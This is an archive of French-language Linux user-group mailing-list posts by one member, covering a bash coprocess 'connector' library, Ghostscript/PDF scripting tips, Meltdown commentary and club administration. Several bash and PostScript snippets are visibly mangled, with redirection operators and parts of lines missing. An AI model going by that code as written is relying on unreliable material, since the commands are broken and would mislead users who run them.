 Félix Hauri  -  <fe...@f-hauri.ch>  -  http://www.f-hauri.ch
___
gull mailing list
gull@forum.linux-gull.ch
http://forum.linux-gull.ch/mailman/listinfo/gull

Re: [gull] Truc et astuces: bash connector

[felix]

On Tue, Feb 06, 2018 at 05:42:44PM +0100, felix wrote:
> ... à "sourcer" ou à lancer pour la démo:
>   https://f-hauri.ch/vrac/shell_connector.sh
Exemple:

  $ wget https://f-hauri.ch/vrac/shell_connector.sh
  ...
  $ . shell_connector.sh 
  $ tty
  /dev/pts/20
  $ ps --tty pts/20 fw
  PID TTY  STAT   TIME COMMAND
  29019 pts/20   Ss 0:00 bash
  30745 pts/20   R+ 0:00  \_ ps --tty pts/20 fw

  $ newConnector /usr/bin/bc "-l" '3*4' 12
  $ ps --tty pts/20 fw
PID TTY  STAT   TIME COMMAND
  29019 pts/20   Ss 0:00 bash
  30944 pts/20   S  0:00  \_ bash
  30945 pts/20   S  0:00  |   \_ /usr/bin/bc -l
  30952 pts/20   R+ 0:00  \_ ps --tty pts/20 fw

  $ declare -p PI
  bash: declare: PI: not found

  $ myBc '4*a(1)' PI
  $ declare -p PI
  declare -- PI="3.14159265358979323844"

  $ newConnector /bin/date '-f - +%s' @0 0
  $ myDate '2000-01-01'
  946681200
  $ myDate "$(ps ho lstart 1)" boottime
  $ myDate now now;myBc "$now-$boottime" uptime;\
read utm idl &-"
  $ eval "exec $DATEIN>&-"
  $ ps --tty pts/20 fw
PID TTY  STAT   TIME COMMAND
   4936 pts/20   Ss 0:00 bash
   5256 pts/20   S  0:00  \_ bash
   5257 pts/20   S  0:00  |   \_ /usr/bin/bc -l
   6358 pts/20   R+ 0:00  \_ ps --tty pts/20 fw

Ce qui n'est pas nécessaire, puisque les sous-tâches se terminent
lorsque le process courrant termine.

> Question et commentaires bienvenus...

-- 
 Félix Hauri  -  <fe...@f-hauri.ch>  -  http://www.f-hauri.ch
___
gull mailing list
gull@forum.linux-gull.ch
http://forum.linux-gull.ch/mailman/listinfo/gull

[gull] Truc et astuces: bash connector

[felix]

Bonjour,

Intro:
  J'ai réalisé des ``connecteurs bash'' pour simples commandes répondant
  une ligne par une ligne, ou pour des clients SQL, testée avec
  "sqlite3" (3.16.2 2017-01-06), "mysql" (Ver 15.1 Distrib 10.1.26-MariaDB)
  et "psql" (PostgreSQL 9.6.6).

  A noter que les connecteurs SQL, utilisant les tabulations `\t` comme
  séparateurs, les champs ou réponses ne doivent pas en contenir!!
  A repenser en fonction du client et des séparateurs probables (voire
  multi-caractères).

Présentation:

  Pour effectuer un calcul, on peut utiliser `bc`:

myPi=$(bc -l <<<'4*a(1)')

  Pour interpréter une date, on peut utiliser `date -d ""`

myUnixDate=$(date -d "2018-01-01 00:00 CET" +%s)

  Pour ces opération, on lance un "fork" (sous-process) qui se termine
  à chaque fois (ouverture d'un process, démarrage du binaire, transmission
  données et résultat, fermeture du process).

  Or ces commandes peuvent fournir plus d'une réponse. Il vaut donc la
  peine, si l'on doit se réferer à ces comandes de manière répétitive,
  de trouver un moyen de n'initier qu'un seul "fork" et de converser avec.

  Test de base:

mkfifo /tmp/myFifoForBc
exec 5> >(bc -l >/tmp/myFifoForBc)
exec 6&5
read -u 6 foo
echo $foo
12

  mais tant que l'on de ferme pas les ``fd'' (5 et 6, en l'occurence), on
  peut continuer d'utilise `bc` qui est *déjà* lancé et prêt.

echo >&5 "pi=4*a(1)"
echo >&5 "2*pi*12"
read -u 6 foo
echo $foo
75.39822368615503772256

Bref, j'en ai fait un fichier de librairie à "sourcer" ou à lancer pour
la démo:

  https://f-hauri.ch/vrac/shell_connector.sh

Question et commentaires bienvenus...

-- 
 Félix Hauri  -    -  http://www.f-hauri.ch
___
gull mailing list
gull@forum.linux-gull.ch
http://forum.linux-gull.ch/mailman/listinfo/gull

Re: [gull] Above Meltdown & Spectre

[felix]

Salut Daniuel,

On Thu, Jan 11, 2018 at 08:44:41PM +0100, Daniel Cordey wrote:
> FYI :
> 
> Comment mieux protéger vos navigateurs (Chrome & Firefox)
> 
> http://www.linuxandubuntu.com/home/how-hackers-can-read-your-websites-passwords-using-meltdown-and-spectre-with-solution
N'importe quoi!

 ``Enabling Site Isolation, the content of every website is always rendered in a
   dedicated process and isolates from other websites''

Si vraiement cela pouvait suffire, ne crois tu pas que google aurrai commencé 
par
recommander la chose?

Le gars qui à écrit cet article n'a probablement rien compris à Meltdown!

De plus, à ma connaissance, les patchs sont déjà disponibles (en tout cas,
pour firefox)...

Mais pour meltdown, pas pour spectre!

Donc bcp de bruit, mais pas les bonnes reccommendations:

 - quitter le navigateur et le relancer entre **chaques** opération sensible,
   voire redémarrer l'ordi juste **avant** une opération bancaire, à n'effectuer
   que dans une ``fenêtre de navigation privée'' et re-démarrer le navigateur
   avant de faire aut'chose...

 - Eteindre l'ordinateur quand on ne l'utilise pas et en particulier ne pas
   laisser le navigateur ouvert (sans surveillance),

 - surveiller les moniteurs de performances et s'inquiéter de pic de charge
   ou de charge prolongées que l'on ne peut pas expliquer,

etc...

Bonne, a1!

-- 
 Félix Hauri  -    -  http://www.f-hauri.ch
___
gull mailing list
gull@forum.linux-gull.ch
http://forum.linux-gull.ch/mailman/listinfo/gull

[gull] Cable USB

[felix]

Bonjour la liste,

Vu le calme, je me permet un petit message légèrement hors propos:

Est-ce que quelqu'un aurrait un câble pour un Nokia 2610?

Il s'agit d'un câble USB avec un petit connecteur carré.

Voilà, me répondre en privé, de préférences!

Meilleures salutations à tous, et bonnes fêtes!

-- 
 Félix Hauri  -    -  http://www.f-hauri.ch
___
gull mailing list
gull@forum.linux-gull.ch
http://forum.linux-gull.ch/mailman/listinfo/gull

Re: [gull] A.G. le 13 janvier 2018 à 10h à St-Cergue

[felix]

Bonjour,

J'en serai!

(peut-être pas tout le weeek-end, mais je serai là samedi à 10oo!)

On Thu, Nov 16, 2017 at 09:38:55PM +0100, BRINER Cédric wrote:
> Bonjour à toutes et à tous,
> 
> J'ai le plaisir de vous annoncer l'AG 2018, qui aura lieu
>le 13 janvier 2018 à 10h à St-Cergue
>au centre communal du Vallon


--
 Félix Hauri  -    -  http://www.f-hauri.ch
___
gull mailing list
gull@forum.linux-gull.ch
http://forum.linux-gull.ch/mailman/listinfo/gull

Re: [gull] Linux on Azure Certification

[felix]

Je précise: c'était du 2ème degré!

Franchement! Voir des ingénieurs Linux certifiés par Microsoft,
c'est assez ``fort de café''!

Next step:
  Prochaine Certification Microsoft: Ingénieurs Mac OS!?
:O)

On Tue, Oct 24, 2017 at 10:14:24AM +0200, Emmanuelle Germond wrote:
> 
> Je ne connaissais pas, merci.  
>   
> Libre à vous,  
> Emmanuelle Germond  
>   
> 
> > Pour qui voudrait voir ses ``compétences'' qualifiées:  
> >   
> >  La certification Microsoft qui valide les compétances Linux!   
> >   
> >  https://buildazure.com/2017/04/20/mcsa-linux-on-azure-certification/   
> >   
> >  ... Si encore le certifiant avait la moindre compétence!   
> >   

-- 
 Félix Hauri  -    -  http://www.f-hauri.ch
___
gull mailing list
gull@forum.linux-gull.ch
http://forum.linux-gull.ch/mailman/listinfo/gull

[gull] Linux on Azure Certification

[felix]

Pour qui voudrait voir ses ``compétences'' qualifiées:

La certification Microsoft qui valide les compétances Linux!

https://buildazure.com/2017/04/20/mcsa-linux-on-azure-certification/

... Si encore le certifiant avait la moindre compétence!

-- 
 Félix Hauri  -    -  http://www.f-hauri.ch
___
gull mailing list
gull@forum.linux-gull.ch
http://forum.linux-gull.ch/mailman/listinfo/gull

Re: [gull] découpage/impression d'un grand pdf

[felix]

Désolé d'arriver si tard...

On Wed, Oct 11, 2017 at 11:53:42AM +0200, François wrote:
> Je m'auto-répond, ça peut servir à d'autres :-)
> ...
> Si en plus je veux rajouter le texte "COL1/LIG1" à 10mm du bas, gauche (aux
> coordonées [0, 0])
> 
> $ gs -dNOPAUSE -dBATCH -sDEVICE=pdfwrite -dSAFER -dSubsetFonts=true
> -dEmbedAllFonts=true -sPAPERSIZE=a4 -sOutputFile="pageA4.pdf" -c
> "< -283.46 -141.73 moveto (COL1/LIG1) show}>> setpagedevice" -f pageA3.pdf
> 
> Ya plus qu'à faire un petit script !

Sinon, tu peux faire du A0 (et plus) avec LaTeX, aussi...
J'ai un client un jour qui m'a donné à imprimer un A0 contenant
des photos avec un plan d'architecture et du texte...

> Pour le texte, je n'ai pas encore trouvé comment passer les coordonnées
> absolue de la page cible [0,0] et pas relatives de la page source
> [-283.46,-141.73].

Tu peux égallement jouer avec psutils (pstops en particulier).

Bonne chance!

-- 
 Félix Hauri  -    -  http://www.f-hauri.ch

___
gull mailing list
gull@forum.linux-gull.ch
http://forum.linux-gull.ch/mailman/listinfo/gull

[gull] Imagerie

[felix]

A propos de manipulation d'images, j'en étais resté à gimp...

Mais voilà que de "nouveaux" produits méritent notre intérêt:

 - krita
   Cette application fait partie de la suite KDE, il est très
   intuitif, à tel point qu'un utilisateur à dit qu'il ressemble
   à un logiciel phare, dans ce domaine.
   Libre et GPL, il est disponnible pour $9,79 sur le microsoft store

 - darktable
   Cette application est plus orienté photos que bitmap... elle
   utilise à fond les données ``méta'', organise les photos en
   base de données, lis les .dng et autres formats ``raw'',
   permet des manipulation du type retouche, correction de
   couleurs, de manière très professionelle.

Si je connais darktable depuis un moment, j'ai découvert Krita
récemment (merci Daniel;).

D'une manière générale, KDE offre beaucoup de bons trucs, qu'en
étant confiné à Gnome, on a du mal à découvrir... Et récipro-
quement je suppose: les utilisateurs KDE aurront moins facilement
accès à des produis développés autour de la libgtk!?

Salut la liste!

-- 
 Félix Hauri  -    -  http://www.f-hauri.ch
___
gull mailing list
gull@forum.linux-gull.ch
http://forum.linux-gull.ch/mailman/listinfo/gull

Re: [gull] création d'un pdf depuis un autre pdf et d'un csv

[felix]

( Remarque: je trouve ``pdftops'' plus efficace que ``pdf2ps''! )

J'était dans le train, quand j'ai re-pensé à ce que j'ai écrit...

On Wed, Oct 04, 2017 at 08:07:40AM +0200, felix wrote:

>   gs -sDEVICE=pdfwrite -dNOPAUSE -dBATCH -dSAFER -sOutputFile=myfile.pdf <(
> res=600   x=100  y=100   string="Premiere partie"formatps="%%\041\n/"
> formatps+="Helvetica findfont\n24 scalefont\nsetfont\nnewpath\n%s %s "
> formatps+="moveto\n(%s) show\nshowpage\n"
> printf "$formatps" $x $y "$string") files{1..12}.ps  <(
> res=600   x=100  y=100   string="Seconde partie"formatps="%%\041\n/"
> formatps+="Helvetica findfont\n24 scalefont\nsetfont\nnewpath\n%s %s "
> formatps+="moveto\n(%s) show\nshowpage\n"
> printf "$formatps" $x $y "$string") files{13..33}.ps 

Voilà, voilà... quelle horreur, pardon!
Je le refais:

  #!/bin/bash

  res=600 x=100 y=100 formatps="%%\041\n/Helvetica findfont\n24 scalefont"
  formatps+="\nsetfont\nnewpath\n%s %s moveto\n(%s) show\nshowpage\n"

  gs -sDEVICE=pdfwrite -dNOPAUSE -dBATCH -dSAFER -sOutputFile=myfile.pdf <(
printf "$formatps" $x $y "Partie I") files{1..12}.ps <(
printf "$formatps" $x $y "Partie II") files{13..33}.ps

-- 
 Félix Hauri  -  <fe...@f-hauri.ch>  -  http://www.f-hauri.ch
___
gull mailing list
gull@forum.linux-gull.ch
http://forum.linux-gull.ch/mailman/listinfo/gull

Re: [gull] création d'un pdf depuis un autre pdf et d'un csv

[felix]

Voilà,

Désolé, les journée n'ont que 24 heures (je sais: si cela ne suffit
pas, il reste encore la nuit;)...

Je disais, oui: Quelque chose comme ce que daniel à proposé, mais

 cat *.pdf  # ne marche pas bien, mais

 cat *.ps # peut, généralement le faire.

sinon

 gs -sDEVICE=pdfwrite -dNOPAUSE -sOutputFile=out.pdf ... *.pdf -c quit 

ou idéalement:

 for file in *.pdf;do pdftops $file ${file%.pdf}.ps;done
 gs -sDEVICE=pdfwrite -dNOPAUSE -sOutputFile=out.pdf ... *.ps -c quit 

Le fera bien...

J'ai créé un script bash pour LaTeX, réalisant un PDF avec des annotations
(méta données) ad'hoc, mais sur la base d'un ou plusieurs .png (à 200dpi).

Il pourrait être adapté pour les intercalaires, quoique si c'est pour
quelques mots, tu peux pondre du postscript ``à la mano''.

Récupéré sur:  http://f-hauri.ch/vrac/postscript/text2tty.sh

  res=600   x=100  y=100   string="Hello world!"
  formatps="%%\041\n/Helvetica findfont\n24 scalefont\nsetfont\nnewpath\n%s %s 
moveto\n(%s) show\nshowpage\n"
  printf "$formatps" $x $y "$string" > myfile.ps

ou

  gs -sDEVICE=pdfwrite -dNOPAUSE -dBATCH -dSAFER -sOutputFile=myfile.pdf <(
res=600   x=100  y=100   string="Premiere partie"formatps="%%\041\n/"
formatps+="Helvetica findfont\n24 scalefont\nsetfont\nnewpath\n%s %s "
formatps+="moveto\n(%s) show\nshowpage\n"
printf "$formatps" $x $y "$string") files{1..12}.ps  <(
res=600   x=100  y=100   string="Seconde partie"formatps="%%\041\n/"
formatps+="Helvetica findfont\n24 scalefont\nsetfont\nnewpath\n%s %s "
formatps+="moveto\n(%s) show\nshowpage\n"
printf "$formatps" $x $y "$string") files{13..33}.ps 

par exemple...

A+!

On Mon, Oct 02, 2017 at 10:03:10PM +0200, BRINER Cédric wrote:
> Yooo.
> 
> j'ai trouvé la solution:
> 
> #!/bin/bash
> 
> i=0
> mkdir build
> rm build/*
> cat destinataire_nb.csv \
> | while read  dest nb; do
>   (( i++ ))
>   convert intercalaire.pdf -gravity North -pointsize 30 -annotate +0+100
> "$dest" build/"$(printf  "%04d" $i)_${dest}.pdf"
>   for j in seq $nb; do
> (( i++ ))
> cp cartable.pdf build/"$(printf  "%04d" $i)_cartable.pdf"
>   done
> done
> pdfunite build/* whole_cartable.pdf
> ___
> gull mailing list
> gull@forum.linux-gull.ch
> http://forum.linux-gull.ch/mailman/listinfo/gull

-- 
 Félix Hauri  -    -  http://www.f-hauri.ch
___
gull mailing list
gull@forum.linux-gull.ch
http://forum.linux-gull.ch/mailman/listinfo/gull

Re: [gull] création d'un pdf depuis un autre pdf et d'un csv

[felix]

A priori, vite-fait (je dois partir...)

  latex + ghostscript + bin-utils...

On Mon, Oct 02, 2017 at 06:41:44PM +0200, BRINER Cédric wrote:
> Salut à tous,
> 
> je souhaite faire des impressions de fichier pdf avec des intercalaires tous
> les X copies.
> 
> Je souhaite avoir un document imprimant:
> - une page intercalaire en couleur avec le nom du destinataire1.
> - x copie d'un pdf en n/b
> - une page intercalaire en couleur avec le nom du destinataire2
> - y copie d'un pdf en n/b
> ...
> ...
> 
> J'ai à disposition une sorte de csv avec:
> nom destinataire, nombre de copie à réaliser pour ce destinataire.
> 
> et le document pdf en n/b.
> 
> Je dois imprimer en tout environ 800 pages, et je souhaite passer par une
> boîte plutôt que d'imprimer ça moi même.
> 
> Dès lors, selon vous comment est-ce que je dois attaquer le problème pour
> n'avoir qu'un seul pdf regroupant les 800 copies.
> 
> Et autre question, savez-vous si un document qui contient tantôt des pages
> n/b en grand nombres (770) et tantôt quelques pages en couleurs une 30aine,
> sera facturé 770 en n/b et 30 en couleur.
> 
> cED
> ___
> gull mailing list
> gull@forum.linux-gull.ch
> http://forum.linux-gull.ch/mailman/listinfo/gull

-- 
 Félix Hauri  -    -  http://www.f-hauri.ch
__
 Félix Hauri - Informaticien consultant  |\  /|   ___  _
 --  | \ __ / |  /-   /   o
 4, rue Centrale / CH-1450 Sainte-Croix  | .. | /_  ___  /
 Tél: (+41/0) 24 454 54 04  Fax:..54 00  |   /\   |/   /__/ /   /  \/
 http://www.f-hauri.ch   | \ __ / |   /   /__  /_  /_  /\
 email: fe...@f-hauri.ch  \  /   -
 Félix Hauri   -Informaticien consultant-   
 Tél: (+41/0) 24 454 54 04 - 079 703 15 36   -   http://www.f-hauri.ch
##  
 Ni PGP, ni cryptage:  Tant que mal maîtrisé et/ou mal installé ce sys-
 tème est entre inutile et dangereux. Attention! Il existe désormais des
 dispositions légales tendant à faire valoir à une signature électronique   
 le même poids qu'une signature manuscrite!
##

___
gull mailing list
gull@forum.linux-gull.ch
http://forum.linux-gull.ch/mailman/listinfo/gull

Re: [gull] Résolus ?

[felix]

Oui, à priori, ça marche...

Je reçoit pas mal de spams, mais le reste semble fonctionner.

Bon, c'est un peu calme...

... Si vous souhaitez **donner** ou **suivre** un petit cours sur

 - openvpn
 - python
 - bash
 - perl
 - websocket
 - virtualisation
 - docker
 - freebpx
 - inkscape
 - open-office

ou autre, voire simplement des question qui peuvent être débatues ici,

manifestez vous!

On Thu, Sep 07, 2017 at 05:01:12PM +0200, Yves Martin wrote:
> Test from free.fr
> 
> On Thu, 2017-09-07 at 12:05 +0200, Daniel Cordey wrote:
> > Hi guys,
> > 
> > Tous les problèmes du système de mail du GULL ont-ils été résolus ?
> > 
> > dc
> 
> ___
> gull mailing list
> gull@forum.linux-gull.ch
> http://forum.linux-gull.ch/mailman/listinfo/gull

-- 
 Félix Hauri  -    -  http://www.f-hauri.ch
___
gull mailing list
gull@forum.linux-gull.ch
http://forum.linux-gull.ch/mailman/listinfo/gull

Re: [gull] Mails system fixed

[felix]

On Sat, Jun 03, 2017 at 01:50:27PM +0200, Samuel Chenal wrote:
> ...
> au bout d'un certain temps. Je voulais faire un montage cifs d'une
> ressource distante, mais le serveur refusait prétextant que le module
> kernel ne reconnaissait pas ce protocole.
> 
> Le uptime du serveur en question était de 396 jours. J'ai donc planifié
> un reboot et tout est rentré dans l'ordre.

Est-ce que, durant ces 396 jours, tu n'aurrais pas fais des mises à jour?

Lorsque tu fais une mise à jour du système, si le kernel ou ses modules
ont été mis à jours, alors tu te trouve avec un décalage entre le système
chargé en mémoire et les modules disponibles pour `insmod` (ou modprobe).

D'une manière générale, lors d'une mise à jour, si tu vois "apt" générer
un nouveau "initramdisk" (cette étape prenant un peu plus de temps qu'une
simple copie de fichiers, tu à bcp de chances de le voir passer, même
en surveillant les messages d'un seul oeil), alors tu *dois* redémarrer
ton système.

Ceci afin d'utiliser le kernel et les modules fraîchement installés, mais
égallement d'assurer que le système va re-démarrer losque tu ne sera pas
là, en cas de coupure de courrant ou autre.

-- 
 Félix Hauri  -    -  http://www.f-hauri.ch
___
gull mailing list
gull@forum.linux-gull.ch
http://forum.linux-gull.ch/mailman/listinfo/gull

[gull] Anti-virus?

[felix]

Bonjour,

ACBM à sorti "Le Virus Informatique" 31.
  http://www.acbm.com/virus/num_31/index.html

Toujours très difficile à dénicher en suisse, je l'ai acheté à Pontarlier.

On y trouve, parmi d'autres, une news plutôt amusante:
 L'anti virus McAfee pour Linux comporte une faille permettant un accès root!

J'ai retrouvé une trace sur "theinquirer.net":

https://www.theinquirer.net/inquirer/news/2479513/mcafee-virusscan-for-linux-vulnerabilities-gave-hackers-root-access

Avant d'installer un anti-virus sur votre Debian, demandez-vous
si c'est bien nécessaire!

A+!

-- 
 Félix Hauri  -    -  http://www.f-hauri.ch
___
gull mailing list
gull@forum.linux-gull.ch
http://forum.linux-gull.ch/mailman/listinfo/gull

Re: [gull] test (was: Serveur ``Government'', forum et autres services)

[felix]

On Thu, Apr 27, 2017 at 11:49:48AM +0200, felix wrote:
> Vraiment désolé! Franchement!
> 
> On Thu, Apr 27, 2017 at 10:41:43AM +0200, felix wrote:
> > Désolé pour le bruit, ceci n'est qu'un test...
> > 
> > On Fri, Mar 31, 2017 at 05:30:01PM +0200, felix wrote:
> > > Test! 1, 2!

-- 
 Félix Hauri  -  <fe...@f-hauri.ch>  -  http://www.f-hauri.ch
___
gull mailing list
gull@forum.linux-gull.ch
http://forum.linux-gull.ch/mailman/listinfo/gull

Re: [gull] test (was: Serveur ``Government'', forum et autres services)

[felix]

Vraiment désolé! Franchement!

On Thu, Apr 27, 2017 at 10:41:43AM +0200, felix wrote:
> Désolé pour le bruit, ceci n'est qu'un test...
> 
> On Fri, Mar 31, 2017 at 05:30:01PM +0200, felix wrote:
> > Test! 1, 2!

-- 
 Félix Hauri  -  <fe...@f-hauri.ch>  -  http://www.f-hauri.ch
___
gull mailing list
gull@forum.linux-gull.ch
http://forum.linux-gull.ch/mailman/listinfo/gull

[gull] test (was: Serveur ``Government'', forum et autres services)

[felix]

Désolé pour le bruit, ceci n'est qu'un test...

On Fri, Mar 31, 2017 at 05:30:01PM +0200, felix wrote:
> Test! 1, 2!

-- 
 Félix Hauri  -  <fe...@f-hauri.ch>  -  http://www.f-hauri.ch
___
gull mailing list
gull@forum.linux-gull.ch
http://forum.linux-gull.ch/mailman/listinfo/gull

Re: [gull] Serveur ``Government'', forum et autres services.

[felix]

Test! 1, 2!

1, 2, 3, Hoé!

On Sun, Mar 26, 2017 at 06:09:37PM +0200, felix wrote:
> Bonjour,
> 
> Le serveur de mail qui gère le forum à eu quelques soucis récement...
> 
> Actuellement il fontionne (je crois), ...

Mais je commence à avoir des doutes... 

Pourriez-vous m'indiquer, afin d'éviter le bruit inutile, de préférence en
répondant sur l'adresse:

  mailto:l...@f-hauri.ch

  .1 combien de mail avez-vous reçus de la liste, durant le mois de mars
  .2 combien de mail avez-vous envoyés sur la liste, durant le mois de mars 
  .3 si vous comptez être présent le 6 avril à l'Hepia pour la présentation 
``Easy-RSA''.

ATTENTION: Nous sommes le 31 mars, ceci n'est donc pas un gag!
( Désolé...
  Par avance, pour ceux qui répondront demain, de grâce, soyez cool!

  https://openclipart.org/tags/fish

 ;-)

... et bon week-end!


-- 
 Félix Hauri  -  <fe...@f-hauri.ch>  -  http://www.f-hauri.ch
___
gull mailing list
gull@forum.linux-gull.ch
http://forum.linux-gull.ch/mailman/listinfo/gull

[gull] Linux dans l'administration fédérale.

[felix]

Bonjour,

Voici une news publiés la semaine dernière sur les site de la confédération:

https://www.admin.ch/gov/fr/accueil/documentation/communiques.msg-id-66081.html
Administration fédérale et logiciels ouverts: le Conseil fédéral fait l’état 
des lieux 

Ainsi qu'une réaction que Daniel m'a demandé de relayer:

On Wed, Mar 22, 2017 at 12:43:45PM +0100, Daniel Cordey wrote:
> On voit ici qu'il reste encore un long chemin à parcourir pour que
> l'administration et nos élus comprennent les enjeux des logiciels
> libres... En effet, on ne semble parler que de logiciels "ouverts",
> alors que ce n'est pas la même chose que logiciels "libres". De plus, on
> voit clairement que l'administration et les élus se trompent
> complètement de cible. On doit avant tout militer pour les "données
> ouvertes" (Open Data) plutôt que de se focaliser bêtement sur les
> logiciels; ce qui laisse toute liberté à la confédération de pouvoir
> déplacer le débat vers la notion de "coûts", dont on sait que les
> résultats sont biaisés d'entrée.

A commencer par comprendre que ``partager'' ne signifie pas ``donner''.

  " Le postulat du conseiller national Balthasar Glättli «Comment autoriser 
"
  " expressément la mise à disposition de logiciels à source ouverte par
"
  " l’administration fédérale?» invite le Conseil fédéral à examiner s’il y a 
lieu  "
  " de compléter la LFC afin d’autoriser expressément la Confédération à mettre 
des "
  " codes sources à la libre disposition du public...   
"

 .1 Les travaux effectués avec nos impôts peuvent (doivent?) être ACCESSIBLES 
par
le producteur (nous). Càd: utilisable, vérifiable, adaptable et corrigeable.
 .2 mettre à la disposition du public signifie partager, mais implique
- accepter les rectifications
- ecouter les suggestions
- supporter la confrontation
Tout cela dans le but de tendre vers l'excellence.

Je met ce mail, posté sur le "forum des utilisateurs de logiciels libres du 
léman" en
copie à M. Roland Meier dans l'espoir que ceci puisse déclancher un échange 
constructif.

J'essairai de préparer une sorte de digeste avec vos réactions afin de lui 
poster
ulterieurement...

Meilleures salutations à tous.

-- 
 Félix Hauri  -    -  http://www.f-hauri.ch
___
gull mailing list
gull@forum.linux-gull.ch
http://forum.linux-gull.ch/mailman/listinfo/gull

[gull] Serveur ``Government'', forum et autres services.

[felix]

Bonjour,

Le serveur de mail qui gère le forum à eu quelques soucis récement...

Actuellement il fontionne (je crois), nous allons devoir lui faire un petit
lifting afin de consolider les services utilisés et éventuellement supprimer
les trucs devenus obsolets, s'il y en a de trop...

Actuellement notre président à la charge de s'en occuper, je n'ai pas compris
ni comment ni pourquoi, mais je pense (personnellement) qu'il pourrait être
déchargé de cette tâche afin de pouvoir libérer du temps pour des activités
liées à la présidence.

Par ailleur, d'autre tâches de comité semble également souffrir de manque.
Relation publique, secretariat, comptabilité, etc... Je ne sais pas tout:
je ne fais pas partie du comité. Je présente mes excuses si un membre se
sent visé, ce n'est pas mon but. Je sais que rien n'est simple, d'ailleur
je n'étais pas présent lors de la dernière AG (mea culpa)...

Bref, le comité à besoin de bras et de cervaux. Si certains d'entre vous ont
de la disponibilité et de la motivation, faites nous part de votre volontarisme
en mentionnant vos compétances et aspirations.

Les réponses peuvent êtres postées sur la liste ou en privé, à l'adresse:

  l...@f-hauri.ch

ou directement au président, comme vous'l'voul!.

En espérant que ce forum puisse retrouver stabilité et dynamisme,

meilleures salutations.

-- 
 Félix Hauri  -    -  http://www.f-hauri.ch
___
gull mailing list
gull@forum.linux-gull.ch
http://forum.linux-gull.ch/mailman/listinfo/gull

[gull] Linux dans l'adminisrtation fédérale.

[felix]

Bonjour,

Voici une news publiés la semaine dernière sur les site de la confédération:

https://www.admin.ch/gov/fr/accueil/documentation/communiques.msg-id-66081.html
Administration fédérale et logiciels ouverts: le Conseil fédéral fait l’état 
des lieux 

Ainsi qu'une réaction que Daniel m'a demandé de relayer:

On Wed, Mar 22, 2017 at 12:43:45PM +0100, Daniel Cordey wrote:
> On voit ici qu'il reste encore un long chemin à parcourir pour que
> l'administration et nos élus comprennent les enjeux des logiciels
> libres... En effet, on ne semble parler que de logiciels "ouverts",
> alors que ce n'est pas la même chose que logiciels "libres". De plus, on
> voit clairement que l'administration et les élus se trompent
> complètement de cible. On doit avant tout militer pour les "données
> ouvertes" (Open Data) plutôt que de se focaliser bêtement sur les
> logiciels; ce qui laisse toute liberté à la confédération de pouvoir
> déplacer le débat vers la notion de "coûts", dont on sait que les
> résultats sont biaisés d'entrée.

A commencer par comprendre que ``partager'' ne signifie pas ``donner''.

  " Le postulat du conseiller national Balthasar Glättli «Comment autoriser 
"
  " expressément la mise à disposition de logiciels à source ouverte par
"
  " l’administration fédérale?» invite le Conseil fédéral à examiner s’il y a 
lieu  "
  " de compléter la LFC afin d’autoriser expressément la Confédération à mettre 
des "
  " codes sources à la libre disposition du public...   
"

 .1 Les travaux effectués avec nos impôts peuvent (doivent?) être ACCESSIBLES 
par
le producteur (nous). Càd: utilisable, vérifiable, adaptable et corrigeable.
 .2 mettre à la disposition du public signifie partager, mais implique
- accepter les rectifications
- ecouter les suggestions
- supporter la confrontation
Tout cela dans le but de tendre vers l'excellence.

Je met ce mail, posté sur le "forum des utilisateurs de logiciels libres du 
léman" en
copie à M. Roland Meier dans l'espoir que ceci puisse déclancher un échange 
constructif.

J'essairai de préparer une sorte de digeste avec vos réactions afin de lui 
poster
ulterieurement...

Meilleures salutations à tous.

-- 
 Félix Hauri  -    -  http://www.f-hauri.ch
___
gull mailing list
gull@forum.linux-gull.ch
http://forum.linux-gull.ch/mailman/listinfo/gull

[gull] Mon VPN à bientôt dix ans! (was: Invitation à: OpenVPN, OpenSSL et EasyRSA, jeudi 6 avril, HEPIA Genève, 19h30)

[felix]

Mon VPN à bientôt dix ans!

Les certificats ont été créés avec une durée de validité de 3652 jours,
ils expirents donc dans quelque semaines... Comment générer de nouveaux
certificats, utilisant les clefs existantes, compatibles et inter-changeable,
 avant leur echéance...

...

Je ne vous cacherai pas que cette présentation fera un usage intensif
de shell et même de bash, avec quelques bashismes...

On Fri, Mar 24, 2017 at 07:01:30PM +0100, cami wrote:
> OpenVPN, OpenSSL et EasyRSA
> 
> OpenVPN est un tunnel sécurisé qui utilise la librairie de chiffrement
> OpenSSL. EasyRSA est un ensemble de scripts créés pour OpenVPN, qui
> utilisent les outils de OpenSSL pour générer un système à trois parties,
> créant (de fait) le RootCA qui va signer les clefs du ou des serveurs et des
> clients.
> 
> Easy RSA
> 
> Le *paquet* Easy-RSA contient des fichiers de configuration à adapter aux
> besoins spécifiques, et des scripts pour:
> - Créer un RootCA, avec clef privée et certificat (publique)
> - Créer une ou des paires (clef + certificat) pour des serveurs OpenVPN
> - Créer (une ou) des paires pour des clients OpenVPN
> - Créer et maintenir un CRL (Certificat Revocation List)
> 
> OpenVPN
> ===
> Serveur de tunnel, basé sur OpenSSL, permettant de relier des sous-réseaux
> locaux via Internet.
> - Configuration de base
> - Down-root?
> - script de connexions (routes)
> - crl
> - debug (comment afficher la date d'expiration des certificats rootca et
> client.crt du coté serveur)
> 
> OpenSSL
> ===
> L'outil binaire qui permet d'utiliser OpenSSL dans les scripts.
> asn1parse(1), ca(1), config(5), crl(1), crl2pkcs7(1), dgst(1),
> dhparam(1), dsa(1), dsaparam(1), enc(1), gendsa(1), genpkey(1),
> genrsa(1), nseq(1), openssl(1), passwd(1), pkcs12(1), pkcs7(1),
> pkcs8(1), rand(1), req(1), rsa(1), rsautl(1), s_client(1), s_server(1),
> s_time(1), smime(1), spkac(1), verify(1), version(1), x509(1),
> crypto(3), ssl(3), x509v3_config(5)
> 
> Nous verrons essentiellement
> ca
> x509
> crl
> mais aussi version, verify, req, rsa, rand, dhparam, pkcs12 et s_client.
> 
> INFORMATIONS PRATIQUES
> La présentation sera suivie d'un apéro sympathique et sera si-possible
> enregistrée
> Lieu: Hepia (http://hepia.hesge.ch/fr/pratique/acces-a-hepia/), Rue de la
> Prairie 4 CH-1202 Genève
> Contact: Cédric BRINER 076 382 39 04
> Quand: le jeudi 6 avril 2017, à 19h30
> Web: http://www2.linux-gull.ch/?q=node/22

> ___
> gull-annonces mailing list
> gull-annon...@forum.linux-gull.ch
> http://forum.linux-gull.ch/mailman/listinfo/gull-annonces


-- 
 Félix Hauri  -    -  http://www.f-hauri.ch
__
 Félix Hauri - Informaticien consultant  |\  /|   ___  _
 --  | \ __ / |  /-   /   o
 4, rue Centrale / CH-1450 Sainte-Croix  | .. | /_  ___  /
